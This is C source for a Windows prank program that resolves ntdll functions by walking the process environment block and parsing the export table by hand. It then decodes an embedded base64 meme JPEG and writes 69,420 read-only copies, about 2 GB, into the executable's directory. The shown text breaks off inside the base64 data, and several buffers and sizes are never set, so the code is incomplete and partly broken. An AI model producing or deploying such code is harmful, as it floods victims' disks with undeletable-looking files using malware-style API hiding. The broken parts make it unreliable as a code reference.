#ifdef _M_AMD64
#define _AMD64_ 1
#else // if defined(_M_IX86)
#error nah
// #define _X86_ 1
#endif

#include <minwindef.h>
#include <ntstatus.h>
#include <winnt.h>
#include <winternl.h>

#include <vcruntime.h>

#include "cdecode.h"

#define PAYLOAD_OUT_NAME L"chungus_"
#define PAYLOAD_OUT_EXTENSION L".jpg"
#define PAYLOAD_OUT_SIZE 31295
#ifdef _DEBUG
#define PAYLOAD_OUT_COUNT 5
#else
#define PAYLOAD_OUT_COUNT 69420
#endif

static BYTE* g_bigChungus;
const size_t BIG_CHUNGUS_SIZE;
BYTE* g_decodedChungus;
size_t g_decodedChungusSize;

#pragma region Helper functions

NTSTATUS FindNtdll(PPEB peb, PVOID* ntdll);
NTSTATUS FindSymbol(PVOID base, PANSI_STRING name, PVOID* symbol);
NTSTATUS LoadFunctions(PVOID ntdll);
NTSTATUS DecodePayload(void);
NTSTATUS WritePayload(PPEB peb, size_t number);

#pragma endregion

#pragma region Imported stuff

#define RTL_CONSTANT_STRING(value)                                             \
    {                                                                          \
        __crt_countof(value) - sizeof(value[0]), __crt_countof(value), value   \
    }

// Whenever one of these is defined in winternl.h or something, there's an
// underscore

typedef NTSTATUS(NTAPI* PFN_NtCreateFile)(
    PHANDLE FileHandle, ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock,
    PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess,
    ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer,
    ULONG EaLength);
PFN_NtCreateFile _NtCreateFile;

typedef NTSTATUS(NTAPI* PFN_NtWriteFile)(HANDLE FileHandle, HANDLE Event,
                                         PIO_APC_ROUTINE ApcRoutine,
                                         PVOID ApcContext,
                                         PIO_STATUS_BLOCK IoStatusBlock,
                                         PVOID Buffer, ULONG Length,
                                         PLARGE_INTEGER ByteOffset, PULONG Key);
PFN_NtWriteFile NtWriteFile;

#ifdef _DEBUG
typedef void (*PFN_DbgPrint)(PCHAR Format, ...);
PFN_DbgPrint DbgPrint;
#else
#define DbgPrint(...)
#endif

typedef NTSTATUS(NTAPI* PFN_NtClose)(HANDLE Handle);
PFN_NtClose _NtClose;

typedef int (*PFN_snprintf)(wchar_t* buffer, size_t n, const wchar_t* fmt, ...);
PFN_snprintf _snwprintf;

typedef void (*PFN_memset)(void* buffer, int c, size_t n);
PFN_memset _memset;

typedef const wchar_t* (*PFN_wcsrchr)(const wchar_t* str, wchar_t c);
PFN_wcsrchr _wcsrchr;

#pragma endregion

int mainCRTStartup(void)
{
    NTSTATUS status = STATUS_SUCCESS;
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;
    PVOID ntdll = NULL;

    status = FindNtdll(peb, &ntdll);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = LoadFunctions(ntdll);
    if (!NT_SUCCESS(status))
    {
        DbgPrint("LoadFunctions failed: NTSTATUS 0x%lX\n", status);
        return status;
    }

    status = DecodePayload();
    if (!NT_SUCCESS(status))
    {
        DbgPrint("DecodePayload failed: NTSTATUS 0x%lX\n", status);
        return status;
    }

    _memset(g_bigChungus, 0, BIG_CHUNGUS_SIZE);

    DbgPrint("Writing %zu payloads named %S%%020zu%S\n", PAYLOAD_OUT_COUNT,
             PAYLOAD_OUT_NAME, PAYLOAD_OUT_EXTENSION);

    size_t count = 0;
    while (count < PAYLOAD_OUT_COUNT)
    {
        status = WritePayload(peb, count + 1);
        if (!NT_SUCCESS(status))
        {
            DbgPrint("WritePayload failed: NTSTATUS 0x%lX\n", status);
            break;
        }
        count++;
    }

    DbgPrint("Wrote %zu payloads, total %zu bytes\n", count,
             count * PAYLOAD_OUT_SIZE);

    _memset(g_decodedChungus, 0, g_decodedChungusSize);

    return status;
}

#pragma region Lazily implemented CRT functions

int memcmp(void* a, void* b, size_t count)
{
    for (size_t i = 0; i < count; i++)
    {
        char ai = ((char*)a)[i];
        char bi = ((char*)b)[i];
        if (ai != bi)
        {
            return ai - bi;
        }
    }

    return 0;
}

size_t strlen(const char* str)
{
    size_t length = 0;
    while (str[length])
    {
        length++;
    }

    return length;
}

void _RTC_InitBase(void)
{
}
void _RTC_Shutdown(void)
{
}
void _RTC_CheckStackVars(void)
{
}
void _RTC_UninitUse(void)
{
}
void __GSHandlerCheck(void)
{
}
uintptr_t __security_cookie;
void __security_check_cookie(uintptr_t cookie)
{
}

#pragma endregion

#pragma region Helper functions

#define NTDLL_NAME L"ntdll.dll"
#define NTDLL_LENGTH (__crt_countof(NTDLL_NAME) - 1)

NTSTATUS FindNtdll(PPEB peb, PVOID* ntdll)
{
    if (!peb || !ntdll)
    {
        return STATUS_INVALID_PARAMETER;
    }

    PPEB_LDR_DATA ldrData = peb->Ldr;
    PLIST_ENTRY head = &ldrData->InMemoryOrderModuleList;
    *ntdll = NULL;
    for (PLIST_ENTRY current = head->Flink; current != head;
         current = current->Flink)
    {
        PLDR_DATA_TABLE_ENTRY entry = CONTAINING_RECORD(
            current, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (entry->FullDllName.Length >= NTDLL_LENGTH)
        {
            PUNICODE_STRING name = &entry->FullDllName;
            size_t offset =
                (name->Length / sizeof(name->Buffer[0])) - NTDLL_LENGTH;
            if (memcmp(name->Buffer + offset, NTDLL_NAME, NTDLL_LENGTH) == 0)
            {
                *ntdll = entry->DllBase;
                return STATUS_SUCCESS;
            }
        }
    }

    return STATUS_DLL_NOT_FOUND;
}

NTSTATUS FindSymbol(PVOID base, PANSI_STRING name, PVOID* symbol)
{
    NTSTATUS status = STATUS_SUCCESS;

    if (!symbol)
    {
        return STATUS_INVALID_PARAMETER;
    }

    if (*symbol)
    {
        return status;
    }

    if (DbgPrint)
    {
        DbgPrint("Locating symbol %Z in DLL mapped at 0x%llX\n", name, base);
    }

    PBYTE ntdllBase = base;
    PIMAGE_DOS_HEADER dosHeader = base;
    PIMAGE_NT_HEADERS64 ntHeaders =
        (PIMAGE_NT_HEADERS64)(ntdllBase + dosHeader->e_lfanew);
    PIMAGE_EXPORT_DIRECTORY edt =
        (PIMAGE_EXPORT_DIRECTORY)(ntdllBase +
                                  ntHeaders->OptionalHeader
                                      .DataDirectory
                                          [IMAGE_DIRECTORY_ENTRY_EXPORT]
                                      .VirtualAddress);
    PDWORD exportAddresses = (PDWORD)(ntdllBase + edt->AddressOfFunctions);
    PDWORD exportNames = (PDWORD)(ntdllBase + edt->AddressOfNames);
    PWORD exportOrdinals = (PWORD)(ntdllBase + edt->AddressOfNameOrdinals);

    // I can't be bothered to make binary search work (not an algorithm I'm very
    // good at)
    status = STATUS_ENTRYPOINT_NOT_FOUND;
    DWORD i;
    for (i = 0; i < edt->NumberOfNames; i++)
    {
        PCHAR currentName = (PCHAR)(ntdllBase + exportNames[i]);
        if (memcmp(currentName, name->Buffer,
                   min(strlen(currentName), name->Length)) == 0)
        {
            status = STATUS_SUCCESS;
            break;
        }
    }

    if (!NT_SUCCESS(status))
    {
        return status;
    }

    WORD ordinal = exportOrdinals[i];
    if (ordinal < edt->NumberOfFunctions)
    {
        DWORD rva = exportAddresses[ordinal];
        *symbol = (ntdllBase + rva);
        if (DbgPrint)
        {
            DbgPrint("Located symbol %Z at 0x%llX\n", name, *symbol);
        }
        return STATUS_SUCCESS;
    }

    if (DbgPrint)
    {
        DbgPrint("Failed to locate symbol %Z\n", name);
    }

    return STATUS_ENTRYPOINT_NOT_FOUND;
}

NTSTATUS LoadFunctions(PVOID ntdll)
{
    NTSTATUS status = STATUS_SUCCESS;

#ifdef _DEBUG
    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("DbgPrint"),
                        &(PVOID)DbgPrint);
    if (!NT_SUCCESS(status))
    {
        return status;
    }
#endif

    DbgPrint("Loading symbols\n");

    status =
        FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("NtCreateFile"),
                   &(PVOID)_NtCreateFile);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("NtWriteFile"),
                        &(PVOID)NtWriteFile);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("NtClose"),
                        &(PVOID)_NtClose);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("_snwprintf"),
                        &(PVOID)_snwprintf);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("memset"),
                        &(PVOID)_memset);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    status = FindSymbol(ntdll, &(ANSI_STRING)RTL_CONSTANT_STRING("wcsrchr"),
                        &(PVOID)_wcsrchr);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    return status;
}

NTSTATUS DecodePayload(void)
{
    DbgPrint("Decoding %zu byte payload\n", BIG_CHUNGUS_SIZE);

    base64_decodestate state;
    base64_init_decodestate(&state);
    g_decodedChungusSize = base64_decode_block(
        g_bigChungus, (const int)BIG_CHUNGUS_SIZE, g_decodedChungus, &state);
    if (g_decodedChungusSize != PAYLOAD_OUT_SIZE)
    {
        DbgPrint("Decoded size is %zu byte(s), expected %zu byte(s)\n", g_decodedChungusSize,
                 PAYLOAD_OUT_SIZE);
        return STATUS_BAD_DATA;
    }

    DbgPrint("Decoding succeeded, %zu byte(s)\n", g_decodedChungusSize);
    return STATUS_SUCCESS;
}

NTSTATUS WritePayload(PPEB peb, size_t number)
{
    // 18446744073709551615 is 20 characters, countof includes the NUL
    wchar_t buffer[MAX_PATH];
    PUNICODE_STRING imagePath = &peb->ProcessParameters->ImagePathName;
    size_t offset = _wcsrchr(imagePath->Buffer, L'\\') - imagePath->Buffer;
    _snwprintf(buffer, __crt_countof(buffer),
               L"\\DosDevices\\%.*"
               L"s\\" PAYLOAD_OUT_NAME L"%020zu" PAYLOAD_OUT_EXTENSION,
               offset, imagePath->Buffer, number);

    DbgPrint("Writing payload %zu to %ws\n", number, buffer);

    HANDLE handle = NULL;
    OBJECT_ATTRIBUTES attributes = {0};
    InitializeObjectAttributes(&attributes,
                               &(UNICODE_STRING)RTL_CONSTANT_STRING(buffer),
                               OBJ_CASE_INSENSITIVE, NULL, NULL);
    IO_STATUS_BLOCK ioStatus = {0};
    NTSTATUS status = _NtCreateFile(
        &handle, GENERIC_WRITE | FILE_WRITE_DATA | SYNCHRONIZE, &attributes,
        &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_READONLY, 0,
        FILE_SUPERSEDE, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);
    if (!NT_SUCCESS(status))
    {
        return status;
    }

    _memset(&ioStatus, 0, sizeof(IO_STATUS_BLOCK));
    status = NtWriteFile(handle, NULL, NULL, NULL, &ioStatus, g_decodedChungus,
                         (ULONG)g_decodedChungusSize, NULL, NULL);

    DbgPrint("Wrote %zu bytes\n", ioStatus.Information);

    _NtClose(handle);
    return status;
}

#pragma endregion

#pragma region Болшой Чунгус
static BYTE g_bigChungusRaw[] =
    "/9j/4AAQSkZJRgABAQEBLAEsAAD/"
    "4QCuRXhpZgAASUkqAAgAAAAHABIBAwABAAAAAQAAABoBBQABAAAAYgAAABsBBQABAAAAagAAAC"
    "gBAwABAAAAAgAAADEBAgANAAAAcgAAADIBAgAUAAAAgAAAAGmHBAABAAAAlAAAAAAAAAAsAQAA"
    "AQAAACwBAAABAAAAR0lNUCAyLjEwLjM0AAAyMDIzOjA4OjAxIDE2OjI4OjU1AAEAAaADAAEAAA"
    "ABAAAAAAAAAP/hDM1odHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvADw/"
    "eHBhY2tldCBiZWdpbj0i77u/"
    "IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+"
    "IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IlhNUCBDb3JlID"
    "QuNC4wLUV4aXYyIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"
    "LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG"
    "1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0"
    "PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG"
    "5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6R0lNUD0iaHR0"
    "cDovL3d3dy5naW1wLm9yZy94bXAvIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veG"
    "FwLzEuMC8iIHhtcE1NOkRvY3VtZW50SUQ9ImdpbXA6ZG9jaWQ6Z2ltcDo4NzllNDUwMy1mMzll"
    "LTRhNGEtOTEyMC1mMzcyMTQ5MGU1ODQiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6YTBkNT"
    "AzNzUtMWU4Mi00MWQzLTk4YTktNzQ1NjM5ZDQyMzczIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50"
    "SUQ9InhtcC5kaWQ6ZjNlMmEwYTItMDU5Mi00ZDdjLTljM2EtNWM3YTI1NDAyMzhjIiBkYzpGb3"
    "JtYXQ9ImltYWdlL2pwZWciIEdJTVA6QVBJPSIyLjAiIEdJTVA6UGxhdGZvcm09IldpbmRvd3Mi"
    "IEdJTVA6VGltZVN0YW1wPSIxNjkwOTIxNzQ0NjQzMTUyIiBHSU1QOlZlcnNpb249IjIuMTAuMz"
    "QiIHhtcDpDcmVhdG9yVG9vbD0iR0lNUCAyLjEwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzOjA4"
    "OjAxVDE2OjI4OjU1LTA0OjAwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMzowODowMVQxNjoyODo1NS"
    "0wNDowMCI+"
    "IDx4bXBNTTpIaXN0b3J5PiA8cmRmOlNlcT4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIi"
    "BzdEV2dDpjaGFuZ2VkPSIvIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOjU4NzlkNTZmLWE5"
    "ZWMtNDkxYS05MGE1LWE0OGQ5NTM2ZGViYSIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iR2ltcCAyLj"
    "EwIChXaW5kb3dzKSIgc3RFdnQ6d2hlbj0iMjAyMy0wOC0wMVQxNjoyOTowNCIvPiA8L3JkZjpT"
    "ZXE+IDwveG1wTU06SGlzdG9yeT4gPC9yZGY6RGVzY3JpcHRpb24+"
    "IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC"
    "AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPD94cG"
    "Fja2V0IGVuZD0idyI/Pv/"
    "iArBJQ0NfUFJPRklMRQABAQAAAqBsY21zBEAAAG1udHJSR0IgWFlaIAfnAAgAAQAUABYAIGFjc"
    "3BNU0ZUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD21gABAAAAANMtbGNtcwAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADWRlc2MAAAEgAAAAQGNwcnQAA"
    "AFgAAAANnd0cHQAAAGYAAAAFGNoYWQAAAGsAAAALHJYWVoAAAHYAAAAFGJYWVoAAAHsAAAAFGd"
    "YWVoAAAIAAAAAFHJUUkMAAAIUAAAAIGdUUkMAAAIUAAAAIGJUUkMAAAIUAAAAIGNocm0AAAI0A"
    "AAAJGRtbmQAAAJYAAAAJGRtZGQAAAJ8AAAAJG1sdWMAAAAAAAAAAQAAAAxlblVTAAAAJAAAABw"
    "ARwBJAE0AUAAgAGIAdQBpAGwAdAAtAGkAbgAgAHMAUgBHAEJtbHVjAAAAAAAAAAEAAAAMZW5VU"
    "wAAABoAAAAcAFAAdQBiAGwAaQBjACAARABvAG0AYQBpAG4AAFhZWiAAAAAAAAD21gABAAAAANM"
    "tc2YzMgAAAAAAAQxCAAAF3v//8yUAAAeTAAD9kP//+6H///"
    "2iAAAD3AAAwG5YWVogAAAAAAAAb6AAADj1AAADkFhZWiAAAAAAAAAknwAAD4QAALbEWFlaIAAA"
    "AAAAAGKXAAC3hwAAGNlwYXJhAAAAAAADAAAAAmZmAADypwAADVkAABPQAAAKW2Nocm0AAAAAAA"
    "MAAAAAo9cAAFR8AABMzQAAmZoAACZnAAAPXG1sdWMAAAAAAAAAAQAAAAxlblVTAAAACAAAABwA"
    "RwBJAE0AUG1sdWMAAAAAAAAAAQAAAAxlblVTAAAACAAAABwAcwBSAEcAQv/"
    "bAEMAoG54jHhkoIyCjLSqoL7w///w3Nzw/////////////////////////////////////////"
    "//////////////////bAEMBqrS08NLw///////////////////////////////////////////"
    "////////////////////////////////////CABEIA+gD6AMBEQACEQEDEQH/"
    "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"
